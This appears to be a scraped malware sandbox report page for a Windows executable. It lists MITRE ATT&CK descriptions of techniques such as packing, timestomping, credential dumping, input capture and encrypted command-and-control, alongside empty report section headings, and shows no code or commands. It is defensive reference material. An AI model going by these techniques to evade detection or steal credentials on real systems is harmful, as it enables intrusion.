Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report v72n86vFFq.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Snort IDS Alerts

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre